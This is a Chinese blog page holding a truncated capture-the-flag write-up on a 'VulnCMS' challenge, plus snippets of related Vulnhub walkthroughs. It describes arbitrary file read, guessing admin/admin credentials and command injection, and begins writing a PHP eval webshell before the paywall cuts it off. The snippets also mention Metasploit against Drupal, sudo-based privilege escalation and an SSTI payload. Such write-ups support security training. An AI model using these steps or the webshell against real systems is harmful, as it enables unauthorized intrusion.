校赛VulnCMS

最新推荐文章于 2024-01-10 22:47:53 发布
最新推荐文章于 2024-01-10 22:47:53 发布
阅读量554 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43774856/article/details/110391235
版权
本文详细介绍了VulnCMS系统中发现的任意文件读取漏洞,通过登录界面推测并访问了后台管理,展示了如何利用命令注入进行操作。作者使用蚁剑连接并查看了database.php,进而创建mysql.php文件查询数据库,最终获取到flag。文章揭示了网站安全的重要性及漏洞利用的过程。
摘要由CSDN通过智能技术生成

校赛VulnCMS

打开链接得到一个网页。
在这里插入图片描述
找到了两处可以读取任意文件的地方。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin,进入管理员界面后,如图所示。

在这里插入图片描述
发现输入命令的地方。

在这里插入图片描述

> echo '<?php @eval($_POST["fe
最低0.47元/天 解锁文章
yjj哈哈哈
关注
专栏目录
【愚公系列】2023年06月 网络安全高级班 104.CTF黑客比赛(vulncms靶机)
时光隧道
06-06 4137
VulnCMS是一款基于PHP和MySQL的开源内容管理系统,在网络安全领域中常被用作漏洞测试的靶机。它具有多个漏洞,包括SQL注入、文件上传、XSS和命令注入等,因此可以用来进行安全漏洞测试和渗透测试训练。VulnCMS的代码开源,可以通过Github等开源项目库获取和使用。
渗透靶场——Vulnhub:VulnCMS
tlovejr的博客
04-08 4993
前言 前几天一直在做HackMyVM系列靶场,今天正常看到了一个Vulnhub系列靶场,这个靶场里面是有3个cms漏洞,所以就那来做做看 1、主机存活探测 arp-scan -l 2、端口扫描 nmap -A -p- -T4 192.168.1.7 在这里会发现一共有3个模块端口,分别是5000端口的wordpress模板、8001端口的Joomla模板、9001端口的Drupal模板,针对这几个cms漏洞,那就直接对症下药,对应的模板用对应的工具去扫描 3、漏洞扫描 对于wordpress模板来
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 571
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
vulnhub之 VulnCMS: 1
qwweggfe的博客
08-06 708
VulnCMS: 1 首先进行ip扫描 看看开启了哪些端口 对端口进行扫描 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000 在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看 我尝试了第八个,可是不行 于是我来测试最后一个 search dr...
vulnhub渗透测试VulnCMS
weixin_44687621的博客
08-25 366
靶机地址:http://www.vulnhub.com/entry/vulncms-1,710/ 扫描虚拟机网卡网段,获得靶机ip地址。 看看靶机开放的服务,这里详细说一下命令参数 -sS SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快,效率高 -sV 版本检测,用来扫描目标主机和端口上运行的软件的版本 -T5 T0-T2:串行扫描 T3-T5:并行扫描 -A 启用操作系统和版本检测,脚本扫描和路由跟踪功能 可以看到上面开放了四个web服务,分别是:单独的nginx、wordp
VULNCMS: 1靶机
logan_logan的博客
07-19 457
1.端口扫描 nmap -A -T4 -p- 10.36.101.128 2.Drupal 7 CMS漏洞利用 nmap总共扫描出三个CMS,最后经过测试Drupal7可以利用; 在这里使用MSF进行利用; 可以成功建立会话,在/var/www/html/drupal/misc这个目录下找到一个tyrell.pass文件; 查看这个文件之后,得到用户tyrell的登录密码; 3.使用tyrell用户SSH登录; 登录成功之后使用sudo -l命令发现/bin/journalctl可以进行
VULNCMS靶场介绍
05-17
VULNCMS靶场是一个基于VULNCMS漏洞模拟平台的实战漏洞靶场,旨在提供一个真实的环境,让安全爱好者和安全专业人员练习漏洞挖掘和利用技能。该靶场包含了多个漏洞,包括但不限于SQL注入、XSS、文件包含、文件上传等,...
Vulnhub-VULNCMS: 1渗透
最新发布
laoyanCZ的博客
01-10 1268
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
靶机渗透练习11-VulnCMS (三个国外著名cms)
Force~
04-03 6450
靶机地址: https://www.vulnhub.com/entry/vulncms-1,710/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192..
靶机渗透练习09-VulnCMS
hirak0的博客
04-15 2082
靶机描述 靶机地址:https://www.vulnhub.com/entry/vulncms-1,710/ Description This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag. Hint: Proc
XYCMS企业建站系统 v1.0
10-18
网站后台路径admin/ 用户名,密码都是admin 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除 产品内容管理:对产品类别进行管理,分为大类和小类,发布最新产品信息 客户案例管理:对客户案例内容进行管理,可以按地区分类,分为大类和小类 招聘信息管理:发布一些招聘信息,在线应聘,后台查看应聘者详细信息 网页广告管理:包括一些图片广告管理。生成JS调用,增加了对联广告管理和漂浮广告,可以控制是否显示(关闭),功能非常强大 其他信息管理:查看管理员登录记录,可以进行修改操作 系统信息管理 系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。可以管理是否关闭网站,注册是否审核,留言是否审核 LOGO/形象图片管理:首页LOGO管理,可以设置长宽大小 安全管理:看相关违规操作记录,查询攻击IP地址,自动封闭IP,管理SQL信息 安全设置:根据需要设置一些安全过滤信息 首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏 管理员管
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
靶场笔记-----YXcms靶场
Zer0ooo的博客
11-21 1万+
靶场环境: 前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。 1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335 2.根据前言...
YXcms(mvc架构php的cms)简单学习与审计
Love&Share
04-05 1万+
YXcms(MVC) YXcms 1.4.7 熟悉MVC架构 路由方式 通过一个 r 的文件指针进行路由 参数传递 in($_GET[]) ...... public function test() { $param=in($_GET['a']); var_dump($param); } ...... $_GET 接收值,通过 in 进行过滤 in 函数 //数据过滤函数库 /* 功能:用来过滤字符串和字符串数组,防止被挂马和sql注入 参数$dat
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
VulnHub-IMF-靶机渗透学习
嗯嗯呐的博客
11-26 3103
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。 目标:得到root权限&找到六个flag.txt 作者:嗯嗯呐 目录信息收集PHP数组绕过getshell缓冲区溢出提权总结 信息收集 Nmap
攻防世界favorite_number
qq_43774856的博客
12-05 867
favorite_number 打开链接得到源码 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc
攻防世界Confusion1
qq_43774856的博客
12-09 833
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值